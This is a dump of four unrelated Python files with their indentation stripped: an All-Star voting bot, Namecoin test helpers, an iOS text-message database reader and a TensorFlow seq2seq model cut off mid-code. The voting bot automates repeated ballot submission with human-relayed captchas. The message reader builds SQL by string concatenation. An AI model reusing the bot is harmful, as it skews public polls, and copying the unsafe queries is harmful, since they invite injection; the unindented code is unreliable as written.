xpath = '//input[contains(@id, "v2-") and @name = "v2" and not(ancestor::div[contains(@style, "display: none")])]'
captcha_xpath = '//input[contains(@id, "v2-") and @name = "v2" and not(ancestor::div[contains(@style, "display: none")])]/../../../..//img'
captcha = browser.find_element_by_xpath(xpath)
captcha.click()
full_captcha = browser.find_element_by_xpath(captcha_xpath)
loaded = False
for i in range(0, 50):
size = full_captcha.size
if size['height'] == 0 or size['width'] == 0:
time.sleep(0.25)
else:
time.sleep(0.25)
loaded = True
break
if loaded:
location = full_captcha.location
scrollX = int(browser.execute_script('return window.scrollX'))
scrollY = int(browser.execute_script('return window.scrollY'))
left = int(location['x']) - scrollX
top = int(location['y']) - scrollY
right = left + int(size['width'])
bottom = top + int(size['height'])
browser.save_screenshot('screenshot.png')
im = Image.open('screenshot.png')
im = im.crop((left, top, right, bottom))
im.save('captcha.gif')
res = self.controller.prompt_captcha("captcha.gif")
captcha.send_keys(res)
button = browser.find_element_by_xpath('//a[contains(@id, "vote-now-button") and not(ancestor::div[contains(@style, "display: none")])]')
browser.execute_script('window.vote_alert_text = ""; window.alert = function(t) { window.vote_alert_text = t };')
self.controller.set_status("Voting")
while True:
button.click()
try:
ensure_switched(captcha)
except ClickError:
continue
break
alert_text = browser.execute_script('return window.vote_alert_text')
voted_35 = False
if len(alert_text) > 0:
print("ALERT! %s" % alert_text)
if re.search('voted 35 times', alert_text):
voted_35 = True
try:
ensure_switched(captcha)
except:
pass
if voted_35:
break
print("Voted 35 times!")
browser.quit()
class Question(object):
def __init__(self, q):
self.q = q
class Captcha(object):
def __init__(self, img):
self.img = img
class Status(object):
def __init__(self, s):
self.s = s
class AllStarApp(tk.Tk):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.geometry('250x100')
self.title('All-Star Voting')
self.in_q = queue.Queue()
self.out_q = queue.Queue()
container = ttk.Frame(self)
container.pack(fill=tk.BOTH, expand=tk.YES)
container.grid_rowconfigure(0, weight=1)
container.grid_columnconfigure(0, weight=1)
self.frames = {}
for F in (CaptchaPage, StatusPage, PromptPage):
frame = F(container, self)
self.frames[F] = frame
frame.grid(row=0, column=0, sticky="nsew", padx=5, pady=5)
self.in_q.put(Status("Royals All-Star Voting!"))
self.process_queue()
def process_queue(self):
try:
a = self.in_q.get_nowait()
if type(a) is Status:
self.show_frame(StatusPage)
self.frames[StatusPage].set_status(a.s)
elif type(a) is Captcha:
self.show_frame(CaptchaPage)
self.frames[CaptchaPage].prompt_captcha(a.img)
elif type(a) is Question:
self.show_frame(PromptPage)
self.frames[PromptPage].prompt_question(a.q)
except queue.Empty:
pass
self.after(250, self.process_queue)
def show_frame(self, c):
frame = self.frames[c]
frame.tkraise()
def prompt_question(self, q):
self.in_q.put(Question(q))
return self.out_q.get(block=True, timeout=None)
def set_status(self, s):
self.in_q.put(Status(s))
def prompt_captcha(self, img):
self.in_q.put(Captcha(img))
return self.out_q.get(block=True, timeout=None)
class CaptchaPage(ttk.Frame):
def __init__(self, parent, controller):
super().__init__(parent)
self.controller = controller
self.label = tk.Label(self)
self.label.grid(column=0, row=0, columnspan=2, sticky="n", pady=5)
clabel = ttk.Label(self, text="Captcha:")
clabel.grid(column=0, row=1, sticky="nw")
self.captcha = tk.StringVar()
self.entry = ttk.Entry(self, textvariable=self.captcha)
self.entry.grid(column=1, row=1, sticky="new")
self.grid_columnconfigure(1, weight=1)
self.grid_rowconfigure(1, weight=1)
def pressed_enter(self, event):
self.controller.out_q.put(self.captcha.get())
self.controller.unbind("<Return>", self.binding)
print("Captcha was %s" % self.captcha.get())
def prompt_captcha(self, c):
self.captcha.set("")
image = tk.PhotoImage(file=c)
self.label.configure(image=image, compound="none")
self.label.image = image
self.binding = self.controller.bind("<Return>", self.pressed_enter)
self.entry.focus_set()
print("Prompting captcha (%s)..." % c)
class StatusPage(ttk.Frame):
def __init__(self, parent, controller):
super().__init__(parent)
self.controller = controller
self.status = tk.StringVar()
label1 = ttk.Label(self, text="Status: ")
label2 = ttk.Label(self, textvariable=self.status)
label1.grid(column=0, row=0, sticky="nw")
label2.grid(column=1, row=0, sticky="nwe")
self.status.set("This is a test")
self.grid_columnconfigure(1, weight=1)
self.grid_rowconfigure(0, weight=1)
def set_status(self, s):
print("Status: %s" % s)
self.status.set(s)
class PromptPage(ttk.Frame):
def __init__(self, parent, controller):
super().__init__(parent)
self.controller = controller
self.question = tk.StringVar()
self.answer = tk.StringVar()
qlabel = ttk.Label(self, textvariable=self.question)
qlabel.grid(row=0, column=0, sticky="nw")
self.entry = ttk.Entry(self, textvariable=self.answer)
self.entry.grid(row=0, column=1, sticky="nwe")
self.question.set("Favorite color?")
self.grid_columnconfigure(1, weight=1)
self.grid_rowconfigure(0, weight=1)
def pressed_enter(self, event):
self.controller.out_q.put(self.answer.get())
self.controller.unbind("<Return>", self.binding)
print(self.answer.get())
def prompt_question(self, q):
self.question.set(q)
self.answer.set("")
self.binding = self.controller.bind("<Return>", self.pressed_enter)
self.entry.focus_set()
print(q)
app = AllStarApp()
ThreadedTask(app).start()
app.mainloop()
|
|
# Copyright (c) 2014 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Helpful routines for regression testing
#
# Add python-bitcoinrpc to module search path:
import os
import sys
from decimal import Decimal, ROUND_DOWN
import json
import random
import shutil
import subprocess
import time
import re
from authproxy import AuthServiceProxy, JSONRPCException
from util import *
def p2p_port(n):
return 11000 + n + os.getpid()%999
def rpc_port(n):
return 12000 + n + os.getpid()%999
def check_json_precision():
"""Make sure json library being used does not lose precision converting BTC values"""
n = Decimal("20000000.00000003")
satoshis = int(json.loads(json.dumps(float(n)))*1.0e8)
if satoshis != 2000000000000003:
raise RuntimeError("JSON encode/decode loses precision")
def sync_blocks(rpc_connections, wait=1):
"""
Wait until everybody has the same block count
"""
while True:
counts = [ x.getblockcount() for x in rpc_connections ]
if counts == [ counts[0] ]*len(counts):
break
time.sleep(wait)
def sync_mempools(rpc_connections, wait=1):
"""
Wait until everybody has the same transactions in their memory
pools
"""
while True:
pool = set(rpc_connections[0].getrawmempool())
num_match = 1
for i in range(1, len(rpc_connections)):
if set(rpc_connections[i].getrawmempool()) == pool:
num_match = num_match+1
if num_match == len(rpc_connections):
break
time.sleep(wait)
bitcoind_processes = {}
def initialize_datadir(dirname, n):
datadir = os.path.join(dirname, "node"+str(n))
if not os.path.isdir(datadir):
os.makedirs(datadir)
with open(os.path.join(datadir, "namecoin.conf"), 'w') as f:
f.write("regtest=1\n");
f.write("rpcuser=rt\n");
f.write("rpcpassword=rt\n");
f.write("port="+str(p2p_port(n))+"\n");
f.write("rpcport="+str(rpc_port(n))+"\n");
return datadir
def base_node_args(i):
"""
Return base arguments to always use for node i. These arguments
are those that are also present for the chain cache and must thus
be set for all runs.
"""
# We choose nodes 1 and 2 to keep -namehistory, because this allows
# us to test both nodes with it and without it in both split
# network parts (0/1 vs 2/3).
if i == 1 or i == 2:
return ["-namehistory"]
return []
def initialize_chain(test_dir):
"""
Create (or copy from cache) a 200-block-long chain and
4 wallets.
namecoind and namecoin-cli must be in search path.
"""
if not os.path.isdir(os.path.join("cache", "node0")):
devnull = open("/dev/null", "w+")
# Create cache directories, run bitcoinds:
for i in range(4):
datadir=initialize_datadir("cache", i)
args = [ os.getenv("NAMECOIND", "namecoind"), "-keypool=1", "-datadir="+datadir, "-discover=0" ]
args.extend(base_node_args(i))
if i > 0:
args.append("-connect=127.0.0.1:"+str(p2p_port(0)))
bitcoind_processes[i] = subprocess.Popen(args)
if os.getenv("PYTHON_DEBUG", ""):
print "initialize_chain: namecoind started, calling namecoin-cli -rpcwait getblockcount"
subprocess.check_call([ os.getenv("NAMECOINCLI", "namecoin-cli"), "-datadir="+datadir,
"-rpcwait", "getblockcount"], stdout=devnull)
if os.getenv("PYTHON_DEBUG", ""):
print "initialize_chain: namecoin-cli -rpcwait getblockcount completed"
devnull.close()
rpcs = []
for i in range(4):
try:
url = "http://rt:[email protected]:%d"%(rpc_port(i),)
rpcs.append(AuthServiceProxy(url))
except:
sys.stderr.write("Error connecting to "+url+"\n")
sys.exit(1)
# Create a 200-block-long chain; each of the 4 nodes
# gets 25 mature blocks and 25 immature.
# blocks are created with timestamps 10 minutes apart, starting
# at 1 Jan 2014
block_time = 1388534400
for i in range(2):
for peer in range(4):
for j in range(25):
set_node_times(rpcs, block_time)
rpcs[peer].generate(1)
block_time += 10*60
# Must sync before next peer starts generating blocks
sync_blocks(rpcs)
# Shut them down, and clean up cache directories:
stop_nodes(rpcs)
wait_bitcoinds()
for i in range(4):
os.remove(log_filename("cache", i, "debug.log"))
os.remove(log_filename("cache", i, "db.log"))
os.remove(log_filename("cache", i, "peers.dat"))
os.remove(log_filename("cache", i, "fee_estimates.dat"))
for i in range(4):
from_dir = os.path.join("cache", "node"+str(i))
to_dir = os.path.join(test_dir, "node"+str(i))
shutil.copytree(from_dir, to_dir)
initialize_datadir(test_dir, i) # Overwrite port/rpcport in bitcoin.conf
def initialize_chain_clean(test_dir, num_nodes):
"""
Create an empty blockchain and num_nodes wallets.
Useful if a test case wants complete control over initialization.
"""
for i in range(num_nodes):
datadir=initialize_datadir(test_dir, i)
def _rpchost_to_args(rpchost):
'''Convert optional IP:port spec to rpcconnect/rpcport args'''
if rpchost is None:
return []
match = re.match('(\[[0-9a-fA-f:]+\]|[^:]+)(?::([0-9]+))?$', rpchost)
if not match:
raise ValueError('Invalid RPC host spec ' + rpchost)
rpcconnect = match.group(1)
rpcport = match.group(2)
if rpcconnect.startswith('['): # remove IPv6 [...] wrapping
rpcconnect = rpcconnect[1:-1]
rv = ['-rpcconnect=' + rpcconnect]
if rpcport:
rv += ['-rpcport=' + rpcport]
return rv
def start_node(i, dirname, extra_args=[], rpchost=None, timewait=None, binary=None):
"""
Start a namecoind and return RPC connection to it
"""
datadir = os.path.join(dirname, "node"+str(i))
if binary is None:
binary = os.getenv("NAMECOIND", "namecoind")
args = [ binary, "-datadir="+datadir, "-keypool=1", "-discover=0", "-rest" ]
args.extend(extra_args)
args.extend(base_node_args(i))
bitcoind_processes[i] = subprocess.Popen(args)
devnull = open("/dev/null", "w+")
if os.getenv("PYTHON_DEBUG", ""):
print "start_node: namecoind started, calling namecoin-cli -rpcwait getblockcount"
subprocess.check_call([ os.getenv("NAMECOINCLI", "namecoin-cli"), "-datadir="+datadir] +
_rpchost_to_args(rpchost) +
["-rpcwait", "getblockcount"], stdout=devnull)
if os.getenv("PYTHON_DEBUG", ""):
print "start_node: calling namecoin-cli -rpcwait getblockcount returned"
devnull.close()
url = "http://rt:rt@%s:%d" % (rpchost or '127.0.0.1', rpc_port(i))
if timewait is not None:
proxy = AuthServiceProxy(url, timeout=timewait)
else:
proxy = AuthServiceProxy(url)
proxy.url = url # store URL on proxy for info
return proxy
def start_nodes(num_nodes, dirname, extra_args=None, rpchost=None, binary=None):
"""
Start multiple namecoinds, return RPC connections to them
"""
if extra_args is None: extra_args = [ [] for i in range(num_nodes) ]
if binary is None: binary = [ None for i in range(num_nodes) ]
return [ start_node(i, dirname, extra_args[i], rpchost, binary=binary[i]) for i in range(num_nodes) ]
def log_filename(dirname, n_node, logname):
return os.path.join(dirname, "node"+str(n_node), "regtest", logname)
def stop_node(node, i):
node.stop()
bitcoind_processes[i].wait()
del bitcoind_processes[i]
def stop_nodes(nodes):
for node in nodes:
node.stop()
del nodes[:] # Emptying array closes connections as a side effect
def set_node_times(nodes, t):
for node in nodes:
node.setmocktime(t)
def wait_bitcoinds():
# Wait for all bitcoinds to cleanly exit
for bitcoind in bitcoind_processes.values():
bitcoind.wait()
bitcoind_processes.clear()
def connect_nodes(from_connection, node_num):
ip_port = "127.0.0.1:"+str(p2p_port(node_num))
from_connection.addnode(ip_port, "onetry")
# poll until version handshake complete to avoid race conditions
# with transaction relaying
while any(peer['version'] == 0 for peer in from_connection.getpeerinfo()):
time.sleep(0.1)
def connect_nodes_bi(nodes, a, b):
connect_nodes(nodes[a], b)
connect_nodes(nodes[b], a)
def find_output(node, txid, amount):
"""
Return index to output of txid with value amount
Raises exception if there is none.
"""
txdata = node.getrawtransaction(txid, 1)
for i in range(len(txdata["vout"])):
if txdata["vout"][i]["value"] == amount:
return i
raise RuntimeError("find_output txid %s : %s not found"%(txid,str(amount)))
def gather_inputs(from_node, amount_needed, confirmations_required=1):
"""
Return a random set of unspent txouts that are enough to pay amount_needed
"""
assert(confirmations_required >=0)
utxo = from_node.listunspent(confirmations_required)
random.shuffle(utxo)
inputs = []
total_in = Decimal("0.00000000")
while total_in < amount_needed and len(utxo) > 0:
t = utxo.pop()
total_in += t["amount"]
inputs.append({ "txid" : t["txid"], "vout" : t["vout"], "address" : t["address"] } )
if total_in < amount_needed:
raise RuntimeError("Insufficient funds: need %d, have %d"%(amount_needed, total_in))
return (total_in, inputs)
def make_change(from_node, amount_in, amount_out, fee):
"""
Create change output(s), return them
"""
outputs = {}
amount = amount_out+fee
change = amount_in - amount
if change > amount*2:
# Create an extra change output to break up big inputs
change_address = from_node.getnewaddress()
# Split change in two, being careful of rounding:
outputs[change_address] = Decimal(change/2).quantize(Decimal('0.00000001'), rounding=ROUND_DOWN)
change = amount_in - amount - outputs[change_address]
if change > 0:
outputs[from_node.getnewaddress()] = change
return outputs
def send_zeropri_transaction(from_node, to_node, amount, fee):
"""
Create&broadcast a zero-priority transaction.
Returns (txid, hex-encoded-txdata)
Ensures transaction is zero-priority by first creating a send-to-self,
then using its output
"""
# Create a send-to-self with confirmed inputs:
self_address = from_node.getnewaddress()
(total_in, inputs) = gather_inputs(from_node, amount+fee*2)
outputs = make_change(from_node, total_in, amount+fee, fee)
outputs[self_address] = float(amount+fee)
self_rawtx = from_node.createrawtransaction(inputs, outputs)
self_signresult = from_node.signrawtransaction(self_rawtx)
self_txid = from_node.sendrawtransaction(self_signresult["hex"], True)
vout = find_output(from_node, self_txid, amount+fee)
# Now immediately spend the output to create a 1-input, 1-output
# zero-priority transaction:
inputs = [ { "txid" : self_txid, "vout" : vout } ]
outputs = { to_node.getnewaddress() : float(amount) }
rawtx = from_node.createrawtransaction(inputs, outputs)
signresult = from_node.signrawtransaction(rawtx)
txid = from_node.sendrawtransaction(signresult["hex"], True)
return (txid, signresult["hex"])
def random_zeropri_transaction(nodes, amount, min_fee, fee_increment, fee_variants):
"""
Create a random zero-priority transaction.
Returns (txid, hex-encoded-transaction-data, fee)
"""
from_node = random.choice(nodes)
to_node = random.choice(nodes)
fee = min_fee + fee_increment*random.randint(0,fee_variants)
(txid, txhex) = send_zeropri_transaction(from_node, to_node, amount, fee)
return (txid, txhex, fee)
def random_transaction(nodes, amount, min_fee, fee_increment, fee_variants):
"""
Create a random transaction.
Returns (txid, hex-encoded-transaction-data, fee)
"""
from_node = random.choice(nodes)
to_node = random.choice(nodes)
fee = min_fee + fee_increment*random.randint(0,fee_variants)
(total_in, inputs) = gather_inputs(from_node, amount+fee)
outputs = make_change(from_node, total_in, amount, fee)
outputs[to_node.getnewaddress()] = float(amount)
rawtx = from_node.createrawtransaction(inputs, outputs)
signresult = from_node.signrawtransaction(rawtx)
txid = from_node.sendrawtransaction(signresult["hex"], True)
return (txid, signresult["hex"], fee)
def assert_equal(thing1, thing2):
if thing1 != thing2:
raise AssertionError("%s != %s"%(str(thing1),str(thing2)))
def assert_greater_than(thing1, thing2):
if thing1 <= thing2:
raise AssertionError("%s <= %s"%(str(thing1),str(thing2)))
def assert_raises(exc, fun, *args, **kwds):
try:
fun(*args, **kwds)
except exc:
pass
except Exception as e:
raise AssertionError("Unexpected exception raised: "+type(e).__name__)
else:
raise AssertionError("No exception raised")
|
|
#!/usr/bin/env python3
# encoding: utf-8
import sqlite3
import operator
import os
import re
import sys
import datetime
class reader():
"""A class for the easy analysis of iOS text message databases."""
def __init__(self):
"""
Initializes the reader instance variables.
"""
# sqlite3 connection to the message database.
self._connSMS = None
# sqlite3 connection to the contacts database.
self._connAdd = None
# Dictionary for caching of the numbers that handles refer to.
self._handleDict = {}
# Dictionary for caching the total number of words for each number.
self._wordDict = {}
# Dictionary for caching the total number of messages for each number.
self._countDict = {}
# Dictionary for caching the total number of sent messages for each
# number.
self._sentDict = {}
# Boolean which defines whether the dictionaries have been built.
self._built = False
def lastDate(self):
""" Returns the date of the most recent message in the database. """
c = self._connSMS.cursor()
c.execute("SELECT `date` FROM `message` ORDER BY `date` DESC LIMIT 0, 1;")
mostrecent = c.fetchone()[0]
return self._intToDate(mostrecent)
def firstDate(self):
""" Returns the date of the most recent message in the database. """
c = self._connSMS.cursor()
c.execute("SELECT `date` FROM `message` ORDER BY `date` ASC LIMIT 0, 1;")
mostrecent = c.fetchone()[0]
return self._intToDate(mostrecent)
def getNameFromNumber(self, number):
""" Returns the name in the addressbook that corresponds to the number argument. """
# Crops the number to the last four digits
# TODO: Fix this in the event two people share the same last four
# digits.
lastfour = str(number)[-4:]
a = self._connAdd.cursor()
# Fetch the id that corresponds to the last four digits.
a.execute("SELECT multivalue_id FROM `ABPhoneLastFour` WHERE 1=1 AND `value` LIKE '" + lastfour + "' ORDER BY `value` DESC LIMIT 0, 50000;")
lastFourRow = a.fetchone()
# If there isn't an id, the name is the number.
if lastFourRow is None:
return str(number)
multiId = lastFourRow[0]
# SQL to go from id to name.
a.execute("SELECT record_id FROM `ABMultiValue` WHERE 1=1 AND `UID` LIKE '" + str(multiId) + "' ORDER BY `_rowid_` ASC LIMIT 0, 50000;")
personId = a.fetchone()[0]
a.execute("SELECT First, Last FROM `ABPerson` WHERE 1=1 AND `ROWID` LIKE '" + str(personId) + "' ORDER BY `_rowid_` ASC LIMIT 0, 50000;")
personRow = a.fetchone()
# Use only the first two words in the name.
# TODO: Correct this, its no longer needed.
if personRow[1] is not None and personRow[0] is not None:
name = personRow[0] + " " + personRow[1].split()[0]
elif personRow[0] is not None:
name = personRow[0]
else:
name = personRow[1]
return name
def getNumberFromHandle(self, handle):
""" Returns the number that corresponds to the given handle argument. """
# If the handle is in the cache, return it from the cache.
if handle in self._handleDict.keys():
return self._handleDict[handle]
# Otherwise match it with SQL and add it to the cache.
else:
d = self._connSMS.cursor()
d.execute("SELECT `id` FROM `handle` WHERE 1=1 AND `ROWID` LIKE '" + str(handle) + "' ORDER BY `_rowid_` ASC LIMIT 0, 1;", )
result = d.fetchone()
if result is not None:
self._handleDict[handle] = result[0]
return result[0]
else:
self._handleDict[handle] = None
return None
def numbersFromName(self, name):
""" Returns the list of numbers that match a given name. """
numbers = []
# Check each number to see if it matches the name.
for number in self.getListOfNumbers():
if self.getNameFromNumber(number) == name:
numbers.append(number)
return numbers
def addAddressBook(self, path):
""" Creates a database connection to the addressbook with a given path. """
assert os.path.exists(path) and self._connAdd is None
self._connAdd = sqlite3.connect(path)
def addSMSDatabase(self, path):
""" Creates a database connection to the messages with a given path. """
assert os.path.exists(path) and self._connSMS is None
self._connSMS = sqlite3.connect(path)
def _build(self):
""" Builds the dictionaries. """
self._buildHandleDict()
self._buildOthers()
self._built = True
def _buildHandleDict(self):
""" Builds the handle dictionary. """
c = self._connSMS.cursor()
c.execute("SELECT DISTINCT `handle_id` FROM `message` ORDER BY `handle_id`;")
handleList = c.fetchall()
for handletuple in handleList:
handle = handletuple[0]
if handle == 0:
continue
self.getNumberFromHandle(handle)
def _buildOthers(self):
""" Builds the other dictionaries. """
c = self._connSMS.cursor()
for key in self._handleDict.keys():
number = self._handleDict[key]
if number not in self._countDict.keys():
self._countDict[number] = 0
if number not in self._wordDict.keys():
self._wordDict[number] = 0
if number not in self._sentDict.keys():
self._sentDict[number] = 0
c.execute("SELECT `text`, `is_sent` FROM 'message' WHERE handle_id=" + str(key))
messageList = c.fetchall()
for messagetuple in messageList:
message = messagetuple[0]
sent = messagetuple[1]
if sent == True:
self._sentDict[number] += 1
if message is not None:
self._countDict[number] += 1
self._wordDict[number] += len(re.findall("[a-zA-Z_]+", message))
def totalMessages(self):
""" Returns the total number of messages in the database. """
c = self._connSMS.cursor()
c.execute("SELECT COUNT(text) FROM `message`")
return c.fetchone()[0]
def getListOfNumbers(self):
""" Returns a list of all of the numbers in the messages database. """
if not self._built:
self._build()
return set(self._handleDict.values())
def messagesOnDate(self, date, number = None):
""" Returns a list of messages on a given date, optionally from a given number. """
messages = []
beg = self._dateToInt(datetime.datetime.combine(date, datetime.time(0)))
end = self._dateToInt(datetime.datetime.combine(date, datetime.time(0)) + datetime.timedelta(days = 1))
c = self._connSMS.cursor()
if not number:
c.execute("SELECT `handle_id`, `date`, `text` FROM `message` WHERE 1=1 AND `date` > ? AND `date` < ?;", (beg, end))
rows = c.fetchall()
for mes in rows:
if mes[2] is not None:
message = Message(mes[2])
message.number = self.getNumberFromHandle(mes[0])
message.timestamp = self._intToDate(mes[1])
messages.append(message)
else:
for handle in self._getHandlesFromNumber(number):
c.execute("SELECT `handle_id`, `date`, `text` FROM `message` WHERE 1=1 AND `date` > ? AND `date` < ? AND `handle_id` = ?;", (beg, end, handle))
rows = c.fetchall()
for mes in rows:
if mes[2] is not None:
message = Message(mes[2])
message.number = self.getNumberFromHandle(mes[0])
message.timestamp = self._intToDate(mes[1])
messages.append(message)
return messages
def countOnDate(self, date, number = None):
""" Returns the count of messages on a given date, optionally from a given number. """
if not self._built:
self._build()
beg = self._dateToInt(datetime.datetime.combine(date, datetime.time(0)))
end = self._dateToInt(datetime.datetime.combine(date, datetime.time(0)) + datetime.timedelta(days = 1))
c = self._connSMS.cursor()
count = 0
if not number:
c.execute("SELECT COUNT(*) FROM `message` WHERE `date` >= ? AND `date` < ? AND `text` IS NOT NULL;", (beg, end))
count = c.fetchone()[0]
else:
for handle in self._getHandlesFromNumber(number):
c.execute("SELECT COUNT(*) FROM `message` WHERE 1=1 AND `date` > ? AND `date` < ? AND `handle_id` = ? AND `text` IS NOT NULL;", (beg, end, handle))
count += c.fetchone()[0]
return count
def totalOnDate(self, date, number = None):
""" Returns the overall total number of messages on a given date, optionally from a given number. """
if not self._built:
self._build()
end = self._dateToInt(datetime.datetime.combine(date, datetime.time(0)) + datetime.timedelta(days = 1))
c = self._connSMS.cursor()
count = 0
if not number:
c.execute("SELECT COUNT(*) FROM `message` WHERE `date` < " + str(end) + " AND `text` IS NOT NULL;")
count = c.fetchone()[0]
else:
for handle in self._getHandlesFromNumber(number):
c.execute("SELECT COUNT(*) FROM `message` WHERE 1=1 AND `date` < ? AND `handle_id` = ? AND `text` IS NOT NULL;", (end, handle))
count += c.fetchone()[0]
self._sentDict = {}
return count
def messagesFromNumber(self, num):
""" Returns a list of all the messages from a given number. """
if not self._built:
self._build()
handles = [handle for handle, number in self._handleDict.items() if number == num]
messages = []
c = self._connSMS.cursor()
for handle in handles:
c.execute("SELECT `handle_id`, `date`, `text`, `is_sent` FROM `message` WHERE 1=1 AND `handle_id` LIKE " + str(handle) + " ORDER BY `date`")
rows = c.fetchall()
for mes in rows:
message = Message(mes[2])
message.number = num
message.timestamp = self._intToDate(mes[1])
if mes[3] == 1:
message.sent = True
else:
message.sent = False
messages.append(message)
return messages
def countFromNumber(self, num):
""" Returns the number of messages from a given number. """
if not self._built:
self._build()
return self._countDict[num]
def wordsFromNumber(self, num):
""" Returns the total number of words from a given number. """
if not self._built:
self._build()
return self._wordDict[num]
def sentFromNumber(self, num):
""" Returns the total number of messages sent to a given number. """
if not self._built:
self._build()
return self._sentDict[num]
def _intToDate(self, integer):
""" Converts a time in interger format (seconds since January First 2001) to a datetime object. """
# TODO Fix so it doesn't need a manual timezone offset.
delta = datetime.timedelta(seconds = integer)
date = datetime.datetime(2001, 1, 1)
timezoneoffset = datetime.timedelta(hours = 5)
return (date + delta - timezoneoffset)
def _dateToInt(self, date):
""" Converts a datetime object to integer format. """
timezoneoffset = datetime.timedelta(hours = 5)
delta = date + timezoneoffset - datetime.datetime(2001, 1, 1)
return int(delta.total_seconds())
def _getHandlesFromNumber(self, num):
""" Returns a list of handles that correspond to a given number. """
handles = [handle for handle, number in self._handleDict.items() if number == num]
return handles
def instancesOf(self, phrase, num):
""" Searches for instances of a given phrase/word
:phrase: the word or phrase to search for.
:num: The number for the conversation to search.
:returns: Number of instances of the given phrase.
"""
messages = self.messagesFromNumber(num)
total = 0
for message in messages:
if message.text is not None:
total += len(re.findall(phrase.upper(), message.text.upper()))
return total
class Message():
""" Message ADT """
def __init__(self, text):
""" Creates the instance variables """
# Canonicalized Number (+15555555555)
self.number = None
# Timestamp: Datetime object.
self.timestamp = None
# Text
self.text = text
# Sent boolean
self.sent = None
def getWords(self):
""" Returns the number of words in a given message. """
if self.text:
return len(re.findall("[a-zA-Z_]+", self.text))
else:
return 0
|
|
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Sequence-to-sequence model with an attention mechanism."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import random
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
import tensorflow as tf
from tensorflow.models.rnn.translate import data_utils
class Seq2SeqModel(object):
"""Sequence-to-sequence model with attention and for multiple buckets.
This class implements a multi-layer recurrent neural network as encoder,
and an attention-based decoder. This is the same as the model described in
this paper: http://arxiv.org/abs/1412.7449 - please look there for details,
or into the seq2seq library for complete model implementation.
This class also allows to use GRU cells in addition to LSTM cells, and
sampled softmax to handle large output vocabulary size. A single-layer
version of this model, but with bi-directional encoder, was presented in
http://arxiv.org/abs/1409.0473
and sampled softmax is described in Section 3 of the following paper.
http://arxiv.org/abs/1412.2007
"""
def __init__(self, source_vocab_size, target_vocab_size, buckets, size,
num_layers, max_gradient_norm, batch_size, learning_rate,
learning_rate_decay_factor, use_lstm=False,
num_samples=512, forward_only=False, output_keep_prob = 0):
"""Create the model.
Args:
source_vocab_size: size of the source vocabulary.
target_vocab_size: size of the target vocabulary.
buckets: a list of pairs (I, O), where I specifies maximum input length
that will be processed in that bucket, and O specifies maximum output
length. Training instances that have inputs longer than I or outputs
longer than O will be pushed to the next bucket and padded accordingly.
We assume that the list is sorted, e.g., [(2, 4), (8, 16)].
size: number of units in each layer of the model.
num_layers: number of layers in the model.
max_gradient_norm: gradients will be clipped to maximally this norm.
batch_size: the size of the batches used during training;
the model construction is independent of batch_size, so it can be
changed after initialization if this is convenient, e.g., for decoding.
learning_rate: learning rate to start with.
learning_rate_decay_factor: decay learning rate by this much when needed.
use_lstm: if true, we use LSTM cells instead of GRU cells.
num_samples: number of samples for sampled softmax.
forward_only: if set, we do not construct the backward pass in the model.
"""
self.source_vocab_size = source_vocab_size
self.target_vocab_size = target_vocab_size
self.buckets = buckets
self.batch_size = batch_size
self.learning_rate = tf.Variable(float(learning_rate), trainable=False)
self.learning_rate_decay_op = self.learning_rate.assign(
self.learning_rate * learning_rate_decay_factor)
self.global_step = tf.Variable(0, trainable=False)
self.output_keep_prob = output_keep_prob
# If we use sampled softmax, we need an output projection.
output_projection = None
softmax_loss_function = None
# Sampled softmax only makes sense if we sample less than vocabulary size.
if num_samples > 0 and num_samples < self.target_vocab_size:
with tf.device("/cpu:0"):
w = tf.get_variable("proj_w", [size, self.target_vocab_size])
w_t = tf.transpose(w)
b = tf.get_variable("proj_b", [self.target_vocab_size])
output_projection = (w, b)
def sampled_loss(inputs, labels):
with tf.device("/cpu:0"):
labels = tf.reshape(labels, [-1, 1])
return tf.nn.sampled_softmax_loss(w_t, b, inputs, labels, num_samples,
self.target_vocab_size)
softmax_loss_function = sampled_loss
# Create the internal multi-layer cell for our RNN.
single_cell = tf.nn.rnn_cell.GRUCell(size)
if use_lstm:
print('Using LSTM cell, with dropout_ratio', self.output_keep_prob)
single_cell = tf.nn.rnn_cell.BasicLSTMCell(size)
single_cell = tf.nn.rnn_cell.DropoutWrapper(single_cell, output_keep_prob=self.output_keep_prob)
cell = single_cell
if num_layers > 1:
cell = tf.nn.rnn_cell.MultiRNNCell([single_cell] * num_layers)
# The seq2seq function: we use embedding for the input and attention.
def seq2seq_f(encoder_inputs, decoder_inputs, do_decode):
return tf.nn.seq2seq.embedding_attention_seq2seq(
encoder_inputs, decoder_inputs, cell,
num_encoder_symbols=source_vocab_size,
num_decoder_symbols=target_vocab_size,
embedding_size=size,
output_projection=output_projection,
feed_previous=do_decode)
# Feeds for inputs.
self.encoder_inputs = []
self.decoder_inputs = []
self.target_weights = []
for i in xrange(buckets[-1][0]): # Last bucket is the biggest one.
self.encoder_inputs.append(tf.placeholder(tf.int32, shape=[None],
name="encoder{0}".format(i)))
for i in xrange(buckets[-1][1] + 1):
self.decoder_inputs.append(tf.placeholder(tf.int32, shape=[None],
name="decoder{0}".format(i)))
self.target_weights.append(tf.placeholder(tf.float32, shape=[None],
name="weight{0}".format(i)))
# Our targets are decoder inputs shifted by one.
targets = [self.decoder_inputs[i + 1]
for i in xrange(len(self.decoder_inputs) - 1)]
# Training outputs and losses.
if forward_only:
self.outputs, self.losses = tf.nn.seq2seq.model_with_buckets(
self.encoder_inputs, self.decoder_inputs, targets,
self.target_weights, buckets, lambda x, y: seq2seq_f(x, y, True),
softmax_loss_function=softmax_loss_function)
# If we use output projection, we need to project outputs for decoding.
if output_projection is not None:
for b in xrange(len(buckets)):
self.outputs[b] = [
tf.matmul(output, output_projection[0]) + output_projection[1]
for output in self.outputs[b]
]
else:
self.outputs, self.losses = tf.nn.seq2seq.model_with_buckets(
self.encoder_inputs, self.decoder_inputs, targets,
